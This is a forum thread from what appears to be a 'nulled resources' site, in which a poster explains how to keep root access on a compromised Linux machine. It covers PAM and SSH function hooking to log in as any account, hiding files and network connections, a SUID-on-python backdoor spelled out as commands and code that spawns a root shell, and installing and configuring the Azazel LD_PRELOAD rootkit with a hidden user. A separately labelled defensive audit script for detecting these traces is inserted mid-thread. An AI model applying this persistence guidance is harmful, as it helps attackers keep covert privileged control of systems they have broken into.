Leak Society - The Home Of Nulled Resources.
Maintaining root.
Thread Owner: Houga, Category: Everything Coding, 1 Comment, 68 Read
08-11-2014, 02:09 AM
#1
Maintaining root access once it has been achieved is surprisingly easy. I'll go over function hooking in greater detail, but rootkits are created to hook pertinent functions. For example, the PAM Library (Pluggable Access Module) comes pre-compiled. After downloading the developer files (source code) and man pages, you can hook the functions with the correct parameters and see their return values. There are several functions that are incorporated into the login process, but hooking these functions and returning success values will allow you to log in as any account and become root. This was recreated, independently, by myself as well as, I'm sure, several other times. Essentially, it allows you to log in as root while keeping extra entries to /etc/shadow or /etc/passwd.
There are several common hooks including those for one of several SSH functions to allow remote, root access to fake accounts. Some can hide files from the OS (such as the ld.so.preload file). Some can hide network connections from the kernel (IE: Netstat won't show an SSH or backdoored TCP connection). There are hundreds of uses for them.

Simple python method:
1. Since you have root access, you can add SUID to files.
2. Add SUID to a scripting engine. I prefer python:
chmod 4755 /usr/bin/python
This adds SUID to python so an unprivileged, non-root user can now execute python scripts as root.
3. Either write a script or open the python command line:
import os
os.setgid(0)
os.setuid(0)

Now, python is in full root and sudo group mode. Executing /bin/sh using system("/bin/sh") spawns a root shell from a non-root account.

Azazel:
Azazel is based on the Jynx rootkit which uses the LD_PRELOAD or ld.so.preload method I've described. There is a python configuration file that I very much recommend that you change to your liking before installing it. You may download/install it:
git clone https://github.com/chokepoint/azazel.git
After that, you'll see a config.py file. Edit it with the text editor of your choice and change the listening port, hidden user's name/password, desired modules, etc... Then execute the python file and you may need to run make && install to install the rootkit.
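
A defender's audit for the two persistence mechanisms described in the post above (a setuid bit on a scripting engine, and libraries listed in ld.so.preload), added here as an example that is not part of the original post. The interpreter name list, the directory list and the function names are assumptions made for the example.

```python
import os
import re
import stat

# Assumed list of scripting-engine basenames that should never be setuid; extend per site.
INTERPRETER = re.compile(r"^(python|perl|ruby|php|lua|node|bash|dash|zsh|sh)[\d.]*$")

def classify(path, mode, uid):
    """Return a finding if a setuid-root regular file is a scripting engine, else None."""
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
        return None
    if INTERPRETER.match(os.path.basename(path)):
        return "setuid-root interpreter: %s (mode %04o)" % (path, stat.S_IMODE(mode))
    return None

def parse_preload(text):
    """List the libraries named in ld.so.preload content.
    glibc splits entries on whitespace or ':' and treats '#' as a comment start."""
    libs = []
    for line in text.splitlines():
        libs += [e for e in re.split(r"[\s:]+", line.split("#", 1)[0]) if e]
    return libs

def audit(root="/", bin_dirs=("bin", "sbin", "usr/bin", "usr/sbin", "usr/local/bin")):
    """Audit a filesystem tree; point root at a read-only mount of the suspect disk."""
    findings = []
    for d in bin_dirs:
        full = os.path.join(root, d)
        try:
            names = sorted(os.listdir(full))
        except OSError:
            continue
        for name in names:
            path = os.path.join(full, name)
            try:
                st = os.lstat(path)  # symlinks are skipped; targets are checked by own name
            except OSError:
                continue
            hit = classify(path, st.st_mode, st.st_uid)
            if hit:
                findings.append(hit)
    try:
        with open(os.path.join(root, "etc/ld.so.preload")) as fh:
            findings += ["ld.so.preload entry: " + lib for lib in parse_preload(fh.read())]
    except OSError:
        pass  # the file is absent on most systems, which is the clean state
    return findings

if __name__ == "__main__":
    print("\n".join(audit()) or "no findings")
```

Because a preloaded library can hook the libc calls used to list and read files, run this from trusted media with root pointing at a read-only mount of the suspect disk rather than on the live host.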
08-11-2014, 11:30 AM
#2
vouch for this really legit c;